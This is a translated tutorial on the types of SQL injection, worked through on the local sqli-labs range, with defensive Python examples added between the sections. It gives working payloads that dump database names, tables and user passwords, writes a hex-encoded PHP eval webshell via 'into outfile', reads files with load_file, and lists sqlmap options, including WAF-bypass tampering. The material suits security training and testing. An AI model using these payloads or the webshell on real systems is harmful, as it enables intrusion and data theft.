2025-02-23 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
Most readers are not familiar with the points covered in "What are the common types and principles of SQL injection?", so the editor has summarized them below with detailed content and clear steps; it should have some reference value. I hope you get something out of it. Let's take a look at "What are the common types and principles of SQL injection".
MySQL basics
MySQL installation
Here we directly use the MySQL bundled in the phpStudy integrated environment.
Common MySQL commands
(1) Connect to MySQL locally
mysql -h localhost -uroot -proot
Parameter description
-h is the address of the database host; for the local machine it can be omitted: mysql -uroot -p
-u is the user to log in as
-p means log in with a password
Default account/password: root/root
Note: when logging in to MySQL, -p must not be followed by a space before the password, but -p on its own, followed by a space and no value, is fine.
(2) View all databases
show databases;
(3) Select a database to use; note that SQL statements end with a semicolon.
use <database name>;
(4) View the tables in the current database
show tables;
(5) View the field structure of a table without exposing its contents
describe <table name>;
(6) View all fields and contents of a table (the database must already have been selected with use)
select * from <table name>;
(7) Write the one-line Trojan peak.php to a specified directory, such as C:\WWW
select "..." into outfile "C:\\WWW\\peak.php"
or
select 0x3c3f70687020406576616c28245f524551554553545b7065616b5d293b3f3e into outfile "C:\\WWW\\peak.php"
Note:
If you write C:\WWW\peak.php with single backslashes, the file WWWpeak.php is created in the MySQL\data directory instead of the specified directory, because the single backslashes are consumed as escape characters.
Also, do not wrap the value in quotes when using hex encoding.
(8) Create a database
create database peak;
(9) Delete a database
drop database <database name>;
(10) Clear a table
delete from <table name>;
(11) Change the root password
mysqladmin -uroot -p password <new password>
After entering the original password, the password is changed successfully.
(12) Query the installation directory (basedir) of the current MySQL instance
select @@basedir;
(13) Create a database (full syntax)
CREATE DATABASE [IF NOT EXISTS]
(14) Create a table
CREATE TABLE table_name (column_name column_type)
(15) Insert a field value
INSERT INTO users (<field name>) VALUES ("<field value>")
(16) Delete data from a table
DELETE FROM [WHERE clause] [ORDER BY clause] [LIMIT clause]
Key information analysis
(1) information_schema
In MySQL, think of information_schema as a database, or rather an information database. It holds information about all the other databases maintained by the MySQL server, such as database names, the tables in each database, the data types and access rights of table columns, and so on.
(2) Description of the commonly used tables of the information_schema database:
SCHEMATA table: provides information about all databases in the current MySQL instance. It is the source of the results of show databases.
TABLES table: provides information about the tables (including views) in each database: which schema a table belongs to, table type, table engine, creation time, and so on. It is the source of the results of show tables from schemaname.
COLUMNS table: provides column information for each table: all the columns of a table and the details of each column. It is the source of the results of show columns from schemaname.tablename.
sqli-labs environment setup
Range environment:
https://github.com/Audi-1/sqli-labs
SQL injection principle
What is SQL injection?
SQL injection means that an attacker injects malicious SQL fragments to break the structure of the application's SQL query, so that the malicious SQL is executed. The harm of SQL injection vulnerabilities is huge: they often lead to the entire database being dumped. Even so, SQL injection remains one of the most common web vulnerabilities.
SQL injection steps
(1) Determine whether injection exists and whether it is numeric or character type.
(2) Guess the number of fields in the SQL query statement.
(3) Determine which field positions can be injected into and used.
(4) Query the databases (the one currently in use, or all of them).
(5) Query the tables in the specified database.
(6) Query the field names in the specified table.
(7) Query the values of the fields in the table.
Common SQL injection types (seven subtypes)
SQL injection can be divided into two broad categories:
non-blind injection and blind injection: non-blind means the page reports errors, blind means it does not.
Common SQL injection methods are:
Union injection
Boolean blind injection
Time-based blind injection
Wide byte injection
Error-based injection
Stacked injection
Second-order injection
Numeric / character injection judgment
First, append a single quote to id to check whether SQL injection may exist: if the page returns normally, there is probably none; if it returns abnormally, there may be.
Suppose the request is ip/?id=1
Numeric type (the parameter is not wrapped in quotes):
id=1 and 1=1 returns a normal page.
id=1 and 1=2 returns an abnormal page.
id=1' and '1'='1 returns an abnormal page.
id=1' and '1'='2 returns an abnormal page.
Character type (the parameter is wrapped in quotes):
id=1 and 1=1 returns a normal page or an error page.
id=1 and 1=2 returns a normal page or an error page.
id=1' and '1'='1 returns a normal page.
id=1' and '1'='2 returns an abnormal page.
The two tests can be summarized as follows:
and 1=1 normal, and 1=2 abnormal: possibly numeric injection / and 1=1 normal or error, and 1=2 normal or error: possibly character injection
' and '1'='1 normal, ' and '1'='2 abnormal: possibly character injection
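The probes described above leave a recognizable trail in web server access logs. The following Python is an added example, not part of the original article: it parses a few constructed Apache-style log lines (the query strings mirror the probes in this section, plus a sleep() probe of the kind covered under time-based blind injection later), percent-decodes the query, tags each request, and correlates pairs of true/false probes from one client whose responses differ in size, which is the Boolean oracle in operation. The log format and the signature regexes are assumptions for the demo, not a rule set taken from the page.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page). The query strings mirror
# the probes discussed above (bare quote, and 1=1 / and 1=2) plus a time-based sleep() probe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs/Less-1/?id=1' HTTP/1.1" 500 201
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs/Less-1/?id=1%27%20and%201%3D1--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs/Less-1/?id=1%27%20and%201%3D2--+ HTTP/1.1" 200 87
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /sqli-labs/Less-9/?id=1%27%20and%20if(length(database())%3D8,sleep(4),null)%23 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "GET /products/?id=42 HTTP/1.1" 200 900
"""

# Combined-log-format style line (assumed layout for this demo).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)

# Signatures correspond to the probe shapes discussed in the text; they are demo rules,
# not a complete detection set.
SIGNATURES = {
    # and 1=1 / and 1=2 style comparisons, quoted or not
    "boolean_probe": re.compile(r"\b(?:and|or)\s+'?\d+'?\s*=\s*'?\d+", re.I),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_probe": re.compile(r"\binformation_schema\.", re.I),
    # '-- ' or '#' used to discard the rest of the original statement
    "comment_tail": re.compile(r"(?:--\s*|#)\s*$"),
}


def decode_query(url: str) -> tuple[str, str]:
    """Split the request target into path and percent-decoded query ('+' becomes a space,
    which is how the '--+' seen in the text ends up as a valid '-- ' comment)."""
    path, _, query = url.partition("?")
    return path, unquote_plus(query)


def classify(query: str) -> list[str]:
    """Return the names of all signatures that match the decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan(log_text: str) -> list[dict]:
    """Parse each log line and keep only requests that look like injection probes."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        path, query = decode_query(m["url"])
        tags = classify(query)
        status = int(m["status"])
        # a lone quote that produces a server error is the very first probe in the text
        if "'" in query and status >= 500:
            tags.append("quote_error")
        if tags:
            findings.append({"line": lineno, "ip": m["ip"], "path": path, "query": query,
                             "status": status, "size": int(m["size"]), "tags": tags})
    return findings


def boolean_pairs(findings: list[dict]) -> list[tuple[str, str]]:
    """The Boolean oracle leaves a signature of its own: one client hits the same path with
    true/false comparisons and receives responses of different sizes."""
    sizes: dict[tuple[str, str], set[int]] = {}
    for f in findings:
        if "boolean_probe" in f["tags"]:
            sizes.setdefault((f["ip"], f["path"]), set()).add(f["size"])
    return sorted(key for key, seen in sizes.items() if len(seen) > 1)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["line"], f["ip"], f["status"], f["tags"], f["query"])
    print("boolean oracle candidates:", boolean_pairs(SAMPLE_LOG and scan(SAMPLE_LOG)))
```

Response size is used as the true/false discriminator because it is what the text describes a tester watching for; on a real site a normalized size or a hash of the body works better, and the time-based probe would additionally be correlated with the request duration field if the log contains one.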
0x01: union injection
Principle
(1) Definition of union select
Merges the results of several SELECT statements into one result set.
(2) Intuitive test in MySQL
SELECT * FROM users WHERE id='1' union select * from users where id=2
Test environment
Less-1
Related functions
group_concat(param1, param2, param3, ...): returns a string result (that is, one row) made up of the values of the arguments in parentheses concatenated together.
char(): converts ASCII codes back to characters
Injection process
1. First determine whether the target has SQL injection and of what type.
http://127.0.0.1/sqli-labs/Less-1/?id=1 // returns correctly
http://127.0.0.1/sqli-labs/Less-1/?id=1' // returns an error: there may be SQL injection
http://127.0.0.1/sqli-labs/Less-1/?id=1 and 1=1 // returns correctly
http://127.0.0.1/sqli-labs/Less-1/?id=1 and 1=2 // returns correctly
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=1 // returns an error
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 // returns an error; from this we can see that $id is probably followed by more of the SQL statement
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=1--+ // returns correctly
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2--+ // returns an error
This shows that the target has SQL injection of character type and that the id variable is followed by other SQL. At this point, look at the source code to confirm that it is character type.
2. Test steps
(1) Use union select to guess the number of fields after select in the target SQL query, and at the same time find out which of the target fields can be used further.
(2) Judgment method: an error in the echo means more than the current number of fields; a correct echo means there are exactly that many fields.
Payload: http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3%23
Note: the purpose of and 1=2 here is to keep the correct id=1 row from being displayed, so that the values of the following union select are shown instead, because the target site is sometimes set to echo only one row of the result, which easily leads to misjudgment.
Result: the number of fields after select in the SQL query statement is 3, and field 2 can be used.
(3) Payload
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,2,3%23
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3%23
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3%23
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3%23
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 union select 1,(select group_concat(username,char(32),password) from users),3%23
(4) Extension
There is another method: order by determines the number of fields.
http://127.0.0.1/sqli-labs/Less-1/?id=1' and 1=2 order by 1%23
Adapt to the specific situation.
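The column-count test above can be reproduced offline. The following Python is an added example written for this article, not code from the original page or from sqli-labs: it uses an in-memory SQLite table named users with the same three columns as the sqli-labs Less-1 table (the sample rows are constructed), recreates the Less-1 query as a string-built statement beside the same query with a bound parameter, and shows why 'union select 1,2' produces an error while 'union select 1,2,3' returns marker values. SQLite does not understand MySQL's '#' comment, so the '-- ' form used earlier in the text is used instead.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory table shaped like the sqli-labs users table (id, username, password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")],  # sample rows, constructed
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """Less-1 style query: the parameter is pasted between single quotes, so a quote in the
    input closes the literal and whatever follows is parsed as SQL."""
    sql = f"SELECT * FROM users WHERE id='{user_input}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_input: str) -> list:
    """Same query with a bound parameter: the whole input is compared as one value."""
    return conn.execute("SELECT * FROM users WHERE id=?", (user_input,)).fetchall()


def union_probe(conn: sqlite3.Connection, n: int) -> tuple:
    """Re-create the column-count test described above against the vulnerable query:
    'and 1=2' suppresses the real row and 'union select 1,...,n' appends marker values.
    SQLite rejects a UNION whose column counts differ, just as MySQL does.
    Returns ("error", message) or ("rows", rows)."""
    markers = ",".join(str(i) for i in range(1, n + 1))
    # '-- ' is the comment form used in the text; '#' is MySQL-only and unknown to SQLite.
    user_input = f"1' and 1=2 union select {markers} -- "
    try:
        return ("rows", vulnerable_lookup(conn, user_input))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    print(union_probe(db, 2))  # column-count mismatch -> ("error", ...)
    print(union_probe(db, 3))  # ("rows", [(1, 2, 3)]): every position echoes its marker
    print(safe_lookup(db, "1' and 1=2 union select 1,2,3 -- "))  # [] : input is just an id value
```

The fix is the bound parameter: the same input that appends a union to the string-built query is compared as a single literal id value and matches nothing. On the server side, a burst of "different number of result columns" errors from one client is itself a useful signal that someone is counting columns.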
0x02: Boolean blind injection
Principle
The web page only returns True or False, so Boolean blind injection is a matter of getting information out of the database according to which of the two the page returns.
Test environment
Less-8
Related function analysis
(1) length: returns the byte length of a string
(2) ascii: converts a character into its ASCII code value
(3) substr(str, pos, len): takes len characters from str starting at position pos (the first position is 1)
(4) count: counts the records in a table, returning the number of rows that match the condition
(5) limit:
limit m: returns the first m rows of data (m > 0), e.g. limit 10 shows rows 1-10
limit x,y: returns y rows of data starting from row x+1
Injection process
1. Determine the length of the database name
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (length(database()))=8%23
2. Guess the database name character by character
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select database()),1,1)))=115%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select database()),2,1)))=101%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select database()),3,1)))=99%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select database()),4,1)))=117%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select database()),5,1)))=114%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select database()),6,1)))=105%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select database()),7,1)))=116%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select database()),8,1)))=121%23
The ASCII codes 115 101 99 117 114 105 116 121 spell out the database name security.
3. Determine the number of tables in the database
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=4%23
4. Guess the length of the fourth table name
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1)))=5%23
5. Guess the fourth table name
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)))=117%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),2,1)))=115%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),3,1)))=101%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),4,1)))=114%23
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),5,1)))=115%23
The fourth table is named users.
6. Determine the number of fields in the users table
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select count(column_name) from information_schema.columns where table_name='users')=3%23
7. Determine the length of the second field
http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select column_name from information_schema.columns where table_name='users' limit 1,1))=8%23
8. Guess the second field name
http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1))=117%23
The second field is named username.
Note: in substr(param1, param2, param3), both 0 and 1 as param2 can normally start from the first character, but here only 1 works, not 0; this may be related to the database version.
9. Guess the number of values in the specified field
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select count(username) from users)=13%23
10. Guess the length of the first value in the first field
http://127.0.0.1/sqli-labs/Less-8/?id=1' and length((select username from users limit 0,1))=4%23
11. Guess the first value in the first field
http://127.0.0.1/sqli-labs/Less-8/?id=1' and ascii(substr((select username from users limit 0,1),1,1))=68%23
The final value is Dumb.
0x03: time-based blind injection
Principle
The general idea of time-based blind injection is delay injection: functions such as sleep() or benchmark() are used to lengthen MySQL's execution time, combined with the conditional if(expr1,expr2,expr3), so that the page's response time reveals whether the statement evaluated to True or False, and unknown fields can be guessed from that.
Test environment
Less-9
Related functions
if(expr1,expr2,expr3): if expr1 is TRUE, the return value is expr2; if expr1 is FALSE, the return value is expr3
sleep(n): delays the response by n seconds
Payload
http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(length(database())=8,sleep(4),null)%23
http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(ascii(substr((select database()),1,1))=115,sleep(4),null)%23
0x04: wide byte injection
Principle
When wide byte injection is present, putting %df%27 in the injected parameter makes the escaping backslash (%5c) get "eaten": under a GBK connection character set, %df and %5c combine into a single two-byte Chinese character, so the single quote that follows is left unescaped.
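Why the escaping backslash gets eaten can be shown with a few lines of Python. This is an added example, not code from the original page: escape_bytewise mimics addslashes-style escaping that works on raw bytes, PAYLOAD is a constructed input beginning with the 0xdf byte and a quote, and unescaped_quotes decodes the escaped bytes the way a server using the given connection character set would and counts quotes that no longer have a backslash in front of them. escape_charset_aware shows the fix: escape only after decoding in the connection character set (or, better, bind parameters so that no escaping is needed at all).

```python
def escape_bytewise(raw: bytes) -> bytes:
    """addslashes-style escaping on raw bytes: put a backslash (0x5c) in front of
    ' " \\ and NUL without knowing which character set the bytes are in."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escape_charset_aware(raw: bytes, charset: str) -> bytes:
    """Decode in the connection character set first, escape whole characters, re-encode.
    This is what a charset-aware escaper does once the connection charset is set
    correctly; bytes that do not decode are replaced instead of being passed through."""
    text = raw.decode(charset, errors="replace")
    escaped = "".join("\\" + ch if ch in "'\"\\\x00" else ch for ch in text)
    return escaped.encode(charset, errors="replace")


def unescaped_quotes(sql_bytes: bytes, charset: str) -> int:
    """Count the single quotes the server would see as unescaped after decoding in
    `charset`, i.e. quotes that could terminate the string literal."""
    text = sql_bytes.decode(charset, errors="replace")
    return sum(1 for i, ch in enumerate(text)
               if ch == "'" and (i == 0 or text[i - 1] != "\\"))


# Constructed input: the %df%27 prefix described above (0xdf followed by a quote) plus a
# harmless tail, as the bytes a script would receive after URL decoding.
PAYLOAD = b"1\xdf' and 1=2"


def demo() -> dict:
    bytewise = escape_bytewise(PAYLOAD)  # b"1\xdf\\' and 1=2"
    return {
        # server decodes as GBK: 0xdf 0x5c becomes one two-byte character, the quote is exposed
        "bytewise_gbk": unescaped_quotes(bytewise, "gbk"),
        # same bytes on a UTF-8 connection: 0xdf is a lone invalid byte, the backslash survives
        "bytewise_utf8": unescaped_quotes(bytewise, "utf-8"),
        # escaping done in the connection charset: nothing is left that can break out
        "aware_gbk": unescaped_quotes(escape_charset_aware(PAYLOAD, "gbk"), "gbk"),
    }


if __name__ == "__main__":
    print(escape_bytewise(PAYLOAD))
    print(demo())  # {'bytewise_gbk': 1, 'bytewise_utf8': 0, 'aware_gbk': 0}
```

The defensive lesson is that the escaper and the database must agree on the character set: either set the connection charset explicitly before escaping, or avoid the whole class of problem with prepared statements, where the value never passes through the SQL parser as text.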
Test environment
Less-32
Payload
http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,2,3%23
http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,(select group_concat(schema_name) from information_schema.schemata),3%23
http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3%23
http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users'),3%23
http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,(select group_concat(username,char(32),password) from users),3%23
0x05: error-based injection
Principle
Error-based injection obtains information by deliberately misusing special functions so that the queried data is output inside the error message.
Test environment
Less-5
Related functions
concat(): concatenates several strings into one string
floor(x): returns the largest integer not greater than x
rand(): generates a random number between 0 and 1
group by: groups the result set according to one or more columns
updatexml(xml_target, xpath_expr, new_xml): updates an XML document. xml_target is the target XML document, xpath_expr the path to update (XPath format), new_xml the new content. The function replaces the single part of xml_target matched by the user-supplied XPath expression xpath_expr with the new XML fragment new_xml and returns the changed XML.
extractvalue(xml_frag, xpath_expr): queries an XML document. It takes an XML fragment xml_frag and an XPath expression xpath_expr (also called a locator) and returns the text() of the first text node that is a child of the element matched by the XPath expression. The first parameter is the target XML document; the second is the search path in XPath form, which must look like /xxx/xxx/xxx. If we write the second parameter in another format, the function reports an error that echoes the illegal content we wrote, and that content is exactly what we want to query.
Reference
https://blog.51cto.com/wt7315/1891458
0x05-1: floor error injection
Payload
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select null,count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select null,count(*),concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select null,count(*),concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select null,count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x%23
0x05-2: updatexml error injection
Payload
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select updatexml(1,concat('~',(database()),'~'),3)%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),3)%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select updatexml(1,concat('~',(select column_name from information_schema.columns where table_name='users' limit 0,1),'~'),3)%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select updatexml(1,concat('~',(select username from users limit 0,1),'~'),3)%23
0x05-3: extractvalue error injection
Payload
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select extractvalue(null,concat(0x7e,(database()),0x7e))%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select extractvalue(null,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'))%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select extractvalue(null,concat('~',(select column_name from information_schema.columns where table_name='users' limit 0,1),'~'))%23
http://127.0.0.1/sqli-labs/Less-5/?id=1' union select extractvalue(null,concat('~',(select username from users limit 0,1),'~'))%23
0x06: stacked injection
Principle
Stacked injection, unlike a union query which is limited to select statements, can be used to execute arbitrary SQL statements. Put simply, it is MySQL's multi-statement query: several statements in one request, separated by semicolons.
Limitations of stacked injection: it cannot be performed in every environment; it may be limited by the API or by database engine support (for example, Oracle databases), or by insufficient privileges. In a web system, because the code usually returns only the first query result, the second statement's error or result is simply ignored, and we cannot see its return value in the front-end interface.
Test environment
Less-38
Payload
http://127.0.0.1/sqli-labs/Less-38/?id=1';create database peak%23
0x07: second-order injection
Principle
Second-order injection is injection caused by malicious data that an attacker has first stored in the database and that is later read out and placed into an SQL query. The defender may escape special characters when the user submits the malicious data, but that escaping only protects the INSERT: the data is stored in its original form (for example, the parameter is filtered and escaped before insertion, but the escaping backslashes themselves are not stored in the database). When the web program later reads the stored malicious data and executes an SQL query built from it, the second-order SQL injection occurs.
Second-order injection can be summarized in two steps:
Step 1: insert malicious data
When data is inserted into the database, special characters are escaped, and the original data is retained when it is written to the database.
Step 2: reference the malicious data
Developers treat data stored in the database as safe by default. When querying, the malicious data is taken directly from the database and used without further validation.
Test environment
Less-24
Payload
(1) First register a user named admin'# (the # starts a comment).
(2) Check the database: the record has been added successfully.
(3) Analysis of the SQL statements in the source code:
Original SQL statement: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'
Password-change statement with the stored username: UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass'
The SQL statement actually executed in the end: UPDATE users SET PASSWORD='$pass' where username='admin'
(4) Finally, change the password of admin'#.
(5) The password of admin is changed successfully.
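Both steps of the Less-24 scenario can be run locally. The following Python is an added example written for this article, not code from the original page or from sqli-labs: it uses an in-memory SQLite users table (constructed sample data), stores the username admin'# through a bound INSERT exactly as step 1 describes, then rebuilds the UPDATE from the text both ways. SQLite has no '#' comment, so strip_mysql_line_comment emulates MySQL's handling in order to run the "actually executed" statement; that emulation is part of the demo, not MySQL behaviour to rely on.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with an existing admin account (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'admin-secret')")
    conn.commit()
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> None:
    """Step 1 in the text: registration binds the input, so admin'# is stored verbatim.
    The INSERT itself is safe; the stored value still contains the quote and the '#'."""
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))
    conn.commit()


def strip_mysql_line_comment(sql: str) -> str:
    """SQLite has no '#' comment, so emulate MySQL dropping everything after '#' on the line.
    Demo-only emulation so the page's 'statement actually executed' can be run here."""
    return sql.split("#", 1)[0].rstrip()


def change_password_vulnerable(conn: sqlite3.Connection, username: str,
                               new_pass: str, curr_pass: str) -> int:
    """Step 2: the username read back from the database is pasted into the SQL string,
    reproducing UPDATE ... where username='$username' and password='$curr_pass'.
    Returns the number of rows changed."""
    sql = (f"UPDATE users SET password='{new_pass}' "
           f"WHERE username='{username}' AND password='{curr_pass}'")
    cur = conn.execute(strip_mysql_line_comment(sql))
    conn.commit()
    return cur.rowcount


def change_password_safe(conn: sqlite3.Connection, username: str,
                         new_pass: str, curr_pass: str) -> int:
    """Hardened form: every value, including data that came out of the database, is bound."""
    cur = conn.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new_pass, username, curr_pass),
    )
    conn.commit()
    return cur.rowcount


def password_of(conn: sqlite3.Connection, username: str):
    row = conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    register(db, "admin'#", "attacker-pass")
    change_password_vulnerable(db, "admin'#", "owned", "attacker-pass")
    print(password_of(db, "admin"))  # owned: the real admin row was rewritten

    db = make_db()
    register(db, "admin'#", "attacker-pass")
    change_password_safe(db, "admin'#", "owned", "attacker-pass")
    print(password_of(db, "admin"))  # admin-secret: only the admin'# row changed
```

The point for defenders is in the two UPDATE functions: escaping at the input boundary was not the failure, trusting a value because it came from your own database was. Binding parameters on every query, including those whose inputs are database columns, removes the second-order case along with the first-order one.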
SQL injection: file read and write
Principle
Using the file read and write privileges of the database account for injection, one can write a one-line Trojan or read sensitive system files.
Utilization conditions
The parameter secure_file_priv restricts data import and export.
secure_file_priv=
means there is no restriction on reading or writing files.
secure_file_priv=NULL
means files can be neither read nor written.
secure_file_priv=F:
means only files under this path can be read or written.
Note
How to view it: show global variables like '%secure%'
How to modify it: set the option in my.ini; if it is absent, add it directly.
Related functions
load_file(): reads a file
into outfile: writes to a file
Test environment
Less-1
Read a file
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,load_file('F:\\1.txt'),3%23
Write a file
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1 into outfile 'F:\\2.php'%23
Common sqlmap parameters
sqlmap download address
http://sqlmap.org/
Common parameters
-u: specify the URL with its parameters
--dbs: list the databases
--batch: run with the default choice for every prompt
--random-agent: use a random User-Agent
-r: POST injection (the request is read from a file)
--level: injection level, 1-5. If level is not given the default is 1; level 5 contains the most payloads and also tests cookie, XFF and other header injection automatically, so it is correspondingly slower
--timeout: set the retry timeout
--cookie: set cookie information
--flush-session: delete the cached session for the specified target and test it again
--tamper: use a WAF bypass script
--time-sec: set the delay time, default 5 seconds
--threads: number of threads, default 1, maximum 10
--keep-alive: by default sqlmap closes the connection right after each successful request; the HTTP message is equivalent to Connection: Close (one connection, closed immediately). Scanning a site's URLs for a long time this way costs more, so persisting the HTTP connection improves scan performance; the HTTP message is then equivalent to Connection: Keep-Alive
Example
py -3 sqlmap.py -u "http://127.0.0.1/sqli-labs/Less-8/?id=1" --dbs --random-agent --batch
The above is the content of this article on "What are the common types and principles of SQL injection?". I believe you now have some understanding of it. I hope what the editor has shared is helpful to you. If you want to know more, please follow the industry information channel.